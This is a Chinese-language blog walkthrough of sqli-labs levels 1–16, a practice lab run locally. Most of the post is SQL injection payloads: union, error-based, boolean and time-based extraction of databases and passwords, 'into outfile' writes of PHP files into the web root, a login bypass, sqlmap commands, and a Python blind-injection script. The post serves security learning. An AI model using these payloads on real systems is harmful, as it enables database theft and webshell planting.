<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 8.1.1">

  <link rel="apple-touch-icon" sizes="180x180" href="/blog/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/blog/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/blog/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/blog/images/logo.svg" color="#222">

<link rel="stylesheet" href="/blog/css/main.css">

<link rel="stylesheet" href="https://fonts.loli.net/css2?family=Nato+Serif+SC:ital,wght@0,300;0,400;0,700;1,300;1,400;1,700&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"luomubing-lin.github.io","root":"/blog/","images":"/blog/images","scheme":"Mist","darkmode":false,"version":"8.26.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/blog/js/config.js" defer></script>

    <meta name="description" content="less1:字符型注入传入参数&#x2F;?id&#x3D;1&#39;报错，判断由于’闭合了查询的引号导致报错 &#x2F;?id&#x3D;1&#39; order by 1,2,3,4--+判断回显行数，4时报错，行数为3 &#x2F;?id&#x3D;-1&#39; union select 1,2,3 --+ 修改有回显的行为需要查询的数据 &#x2F;?id&#x3D;-1&#39; union select 1,2,group_concat(table_name">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs">
<meta property="og:url" content="https://luomubing-lin.github.io/2025/11/26/sqli-labs/index.html">
<meta property="og:site_name" content="Mul1n&#39;s Blog">
<meta property="og:description" content="less1:字符型注入传入参数&#x2F;?id&#x3D;1&#39;报错，判断由于’闭合了查询的引号导致报错 &#x2F;?id&#x3D;1&#39; order by 1,2,3,4--+判断回显行数，4时报错，行数为3 &#x2F;?id&#x3D;-1&#39; union select 1,2,3 --+ 修改有回显的行为需要查询的数据 &#x2F;?id&#x3D;-1&#39; union select 1,2,group_concat(table_name">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://luomubing-lin.github.io/blog/images/Pasted_image_20251107215106.png">
<meta property="og:image" content="https://luomubing-lin.github.io/blog/images/Pasted_image_20251107215106.png">
<meta property="og:image" content="https://luomubing-lin.github.io/blog/images/Pasted_image_20251107230615.png">
<meta property="og:image" content="https://luomubing-lin.github.io/blog/images/Pasted_image_20251107230711.png">
<meta property="article:published_time" content="2025-11-26T14:06:43.000Z">
<meta property="article:modified_time" content="2025-12-16T11:20:52.754Z">
<meta property="article:author" content="mul1n">
<meta property="article:tag" content="sql">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://luomubing-lin.github.io/blog/images/Pasted_image_20251107215106.png">


<link rel="canonical" href="https://luomubing-lin.github.io/2025/11/26/sqli-labs/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://luomubing-lin.github.io/2025/11/26/sqli-labs/","path":"2025/11/26/sqli-labs/","title":"sqli-labs"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>sqli-labs | Mul1n's Blog</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/blog/js/utils.js" defer></script><script src="/blog/js/motion.js" defer></script><script src="/blog/js/sidebar.js" defer></script><script src="/blog/js/next-boot.js" defer></script>

  






  





<style>
  body {
    background: url(/blog/images/back.jpg) no-repeat center center fixed !important;
    background-size: cover !important;
  }
</style>
  <noscript>
    <link rel="stylesheet" href="/blog/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/blog/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Mul1n's Blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/blog/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-tags"><a href="/blog/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/blog/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/blog/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#less1-%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">1.</span> <span class="nav-text">less1:字符型注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less2-%E6%95%B0%E5%AD%97%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">2.</span> <span class="nav-text">less2:数字型注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less3-%E9%97%AD%E5%90%88"><span class="nav-number">3.</span> <span class="nav-text">less3:()闭合</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less4-%E2%80%9D%E9%97%AD%E5%90%88"><span class="nav-number">4.</span> <span class="nav-text">less4:”闭合</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less5-%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">5.</span> <span class="nav-text">less5:报错注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less6"><span class="nav-number">6.</span> <span class="nav-text">less6:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less7-outfile"><span class="nav-number">7.</span> <span class="nav-text">less7: outfile</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less8"><span class="nav-number">8.</span> <span class="nav-text">less8:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less9"><span class="nav-number">9.</span> <span class="nav-text">less9:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less10"><span class="nav-number">10.</span> <span class="nav-text">less10:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less11"><span class="nav-number">11.</span> <span class="nav-text">less11:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less12"><span class="nav-number">12.</span> <span class="nav-text">less12:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less13"><span class="nav-number">13.</span> <span class="nav-text">less13:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less14"><span class="nav-number">14.</span> <span class="nav-text">less14:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less15"><span class="nav-number">15.</span> <span class="nav-text">less15:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#less16"><span class="nav-number">16.</span> <span class="nav-text">less16:</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="mul1n"
      src="/blog/images/tou.jpg">
  <p class="site-author-name" itemprop="name">mul1n</p>
  <div class="site-description" itemprop="description">此博客用于记录本人的网络安全学习生涯</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/blog/archives/">
          <span class="site-state-item-count">5</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/blog/categories/">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/blog/tags/">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://luomubing-lin.github.io/2025/11/26/sqli-labs/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/blog/images/tou.jpg">
      <meta itemprop="name" content="mul1n">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Mul1n's Blog">
      <meta itemprop="description" content="此博客用于记录本人的网络安全学习生涯">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="sqli-labs | Mul1n's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sqli-labs
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2025-11-26 22:06:43" itemprop="dateCreated datePublished" datetime="2025-11-26T22:06:43+08:00">2025-11-26</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2025-12-16 19:20:52" itemprop="dateModified" datetime="2025-12-16T19:20:52+08:00">2025-12-16</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/blog/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h3 id="less1-字符型注入"><a href="#less1-字符型注入" class="headerlink" title="less1:字符型注入"></a>less1:字符型注入</h3><p>传入参数<code>/?id=1&#39;</code>报错，判断由于’闭合了查询的引号导致报错</p>
<p><code>/?id=1&#39; order by 1,2,3,4--+</code>判断回显行数，4时报错，行数为3</p>
<p><code>/?id=-1&#39; union select 1,2,3 --+</code> 修改有回显的行为需要查询的数据</p>
<p><code>/?id=-1&#39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+</code></p>
<p>爆出当前页面数据库的表名：emails,referers,uagents,users</p>
<p>&#96;&#96;</p>
<p><code>/?id=-1&#39; union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#39;users&#39;--+</code> </p>
<p>爆出列名：id,username,password</p>
<p><code>/?id=-1&#39; union select 1,2,group_concat(password) from users--+</code> </p>
<p>爆出所有的密码</p>
<h3 id="less2-数字型注入"><a href="#less2-数字型注入" class="headerlink" title="less2:数字型注入"></a>less2:数字型注入</h3><p>传入参数直接被带入查询，没有任何引号包裹</p>
<p>注入时无需’闭合</p>
<p>其他与less1基本相同</p>
<h3 id="less3-闭合"><a href="#less3-闭合" class="headerlink" title="less3:()闭合"></a>less3:()闭合</h3><p><code>/?id=1&#39;</code>观察报错信息发现有），尝试<code>/?id=1&#39;)</code>来闭合其他与前面相同</p>
<h3 id="less4-”闭合"><a href="#less4-”闭合" class="headerlink" title="less4:”闭合"></a>less4:”闭合</h3><p>输入<code>/?id=1&#39;</code>不报错，输入<code>/?id=1&quot;</code>报错,报错信息显示有），使用<code>/?id=1&quot;)</code></p>
<h3 id="less5-报错注入"><a href="#less5-报错注入" class="headerlink" title="less5:报错注入"></a>less5:报错注入</h3><p>正常不显示数据，但是会显示报错，<code>extractvalue(1,concat(0x5c,(select database())));</code>使用此函数0x5c,0x7e引起报错，返回database()的非法数据</p>
<p>注意extractvalue()最多输出32个字符需要搭配substr()截断使用</p>
<p>如：<code>extractvalue(1,concat(0x5c,substr((select database()),-20)));</code> 输出后20位</p>
<p><code>/?id=-1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)%23</code></p>
<p>成功爆出数据库名security</p>
<p><code>updatexml(1,concat(0x7e,database(),0x7e,user()),1)</code> 同样这个函数也是相同的效果</p>
<h3 id="less6"><a href="#less6" class="headerlink" title="less6:"></a>less6:</h3><p>同款报错注入，不过用双引号闭合</p>
<p><code>/?id=1&quot;%20union%20select%201,2,updatexml(1,concat(0x7e,database()),1)--+</code></p>
<h3 id="less7-outfile"><a href="#less7-outfile" class="headerlink" title="less7: outfile"></a>less7: outfile</h3><p>发现只有两种回显，布尔盲注，提示使用outfile，先判断闭合，擦查看源代码发现是</p>
<p><code>$sql=&quot;SELECT * FROM users WHERE id=((&#39;$id&#39;)) LIMIT 0,1&quot;;</code>  </p>
<p>即采用<code>/?id=1&#39;))</code>闭合，文件保存路径通过以前关卡的报错获得</p>
<p><code>/?id=-1&#39;)) union select 1,2,database() into outfile &#39;D:/phpstudy_pro/WWW/sqli-labs/sqli-labs-master/Less-7/1.txt&#39;--+</code> </p>
<p>在可以在web网页下写入文件是写入shell文件更为便捷</p>
<p><code>/?id=-1&#39;)) union select 1,2,&quot;&lt;?php phpinfo(); ?&gt;&quot; into outfile &#39;D:/phpstudy_pro/WWW/sqli-labs/sqli-labs-master/Less-7/1.php&#39;--+</code> </p>
<h3 id="less8"><a href="#less8" class="headerlink" title="less8:"></a>less8:</h3><p>报错完全无回显，先用延时注入判断闭合符号</p>
<p><code>/?id=1&#39; and sleep(5)--+</code>  延时成功则使用’闭合</p>
<p><code>/?id=-1&#39; union select 1,2,&quot;&lt;?php phpinfo(); ?&gt;&quot; into outfile &#39;D:/phpstudy_pro/WWW/sqli-labs/sqli-labs-master/Less-8/1.php&#39;--+</code> </p>
<p>与less7相同 使用outfile</p>
<p>其他解法：</p>
<p>编写exp爆出数据库名：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span></span><br><span class="line">host = <span class="string">&quot;http://127.0.0.1/Less-8/&quot;</span></span><br><span class="line">sql = <span class="string">&quot;select database()&quot;</span></span><br><span class="line"><span class="comment"># sql = &quot;select flag from ctftraining.flag&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">1000</span>):</span><br><span class="line">    <span class="built_in">min</span> = <span class="number">32</span></span><br><span class="line">    <span class="built_in">max</span> = <span class="number">128</span></span><br><span class="line">    mid = (<span class="built_in">min</span> + <span class="built_in">max</span>) // <span class="number">2</span></span><br><span class="line">    <span class="keyword">while</span> (<span class="built_in">min</span> &lt; <span class="built_in">max</span>):</span><br><span class="line">        payload = host + <span class="string">&quot;?id=1&#x27; and (ascii(substr(&quot;</span> + <span class="string">&#x27;(&#x27;</span> + sql + <span class="string">&#x27;)&#x27;</span> + <span class="string">&quot;,&#123;&#125;,1))&gt;&#123;&#125;)--+&quot;</span>.<span class="built_in">format</span>(i, mid)</span><br><span class="line">        res = requests.get(url=payload)</span><br><span class="line">        <span class="comment"># print(payload)</span></span><br><span class="line">        time.sleep(<span class="number">0.05</span>)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;You are in...........&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> res.text:</span><br><span class="line">            <span class="built_in">max</span> = mid</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="built_in">min</span> = mid + <span class="number">1</span></span><br><span class="line">        mid = (<span class="built_in">min</span> + <span class="built_in">max</span>) // <span class="number">2</span></span><br><span class="line">    <span class="keyword">if</span> mid &lt;= <span class="number">32</span> <span class="keyword">or</span> mid &gt;= <span class="number">127</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    flag = flag + <span class="built_in">chr</span>(mid)</span><br><span class="line">    <span class="built_in">print</span>(flag)</span><br></pre></td></tr></table></figure>

<h3 id="less9"><a href="#less9" class="headerlink" title="less9:"></a>less9:</h3><p><code>?id=1&#39; and sleep(5)--+</code><br>延时注入，测得注入点为’，因为这一关输入什么页面只有一种回显，使用延时注入<br>不废话sqlmap一把梭<br>sqlmap -u <a target="_blank" rel="noopener" href="http://locat.test/Less-9/?id=1">http://locat.test/Less-9/?id=1</a> –dbs</p>
<h3 id="less10"><a href="#less10" class="headerlink" title="less10:"></a>less10:</h3><p>&#x2F;?id&#x3D;1” and sleep(5)–+ ,使用双引号闭合，同less9</p>
<h3 id="less11"><a href="#less11" class="headerlink" title="less11:"></a>less11:</h3><p><img src="/blog/images/Pasted_image_20251107215106.png"><br>post型注入，先使用万能密码试试：1’ or 1&#x3D;1 成功登录<br>抓包查看表单数据：uname&#x3D;1&amp;passwd&#x3D;1&amp;submit&#x3D;Submit<br>post:   submit&#x3D;Submit&amp;uname&#x3D;-1&amp;passwd&#x3D;-1’ union select 1,2#</p>
<p><img src="/blog/images/Pasted_image_20251107215106.png"></p>
<p>就可以进行查询了:<br>submit&#x3D;Submit&amp;uname&#x3D;-1&amp;passwd&#x3D;-1’ union select database(),version()#<br>或者使用sqlmap：<br>sqlmap -u <a target="_blank" rel="noopener" href="http://192.168.1.16/Less-11">http://192.168.1.16/Less-11</a><br>–data&#x3D;”submit&#x3D;Submit&amp;uname&#x3D;1&amp;passwd&#x3D;1” –dbs</p>
<h3 id="less12"><a href="#less12" class="headerlink" title="less12:"></a>less12:</h3><p>根据报错判断使用”),其他与less11一致</p>
<h3 id="less13"><a href="#less13" class="headerlink" title="less13:"></a>less13:</h3><p>根据报错判断使用’)闭合，但是正确时没有回显，使用报错注入<br><code>Submit=submit&amp;passwd=-1&amp;uname=-1&#39;) and updatexml(1,concat(0x7e,database(),0x7e),1)#</code></p>
<h3 id="less14"><a href="#less14" class="headerlink" title="less14:"></a>less14:</h3><p>使用”闭合，其余与less13相同</p>
<h3 id="less15"><a href="#less15" class="headerlink" title="less15:"></a>less15:</h3><p>没有报错信息，但是可以根据图片回显判断<br>提交1’ or 1&#x3D;1#<br><img src="/blog/images/Pasted_image_20251107230615.png"><br>提交错误：<br><img src="/blog/images/Pasted_image_20251107230711.png"><br>直接sqlmap吧</p>
<h3 id="less16"><a href="#less16" class="headerlink" title="less16:"></a>less16:</h3><p>跟less15差不多，使用”)闭合</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/blog/tags/sql/" rel="tag"># sql</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/blog/2025/11/26/first-blog/" rel="prev" title="first_blog">
                  <i class="fa fa-angle-left"></i> first_blog
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/blog/2025/11/26/xss-labs/" rel="next" title="xss-labs">
                  xss-labs <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">mul1n</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/mist/" rel="noopener" target="_blank">NexT.Mist</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
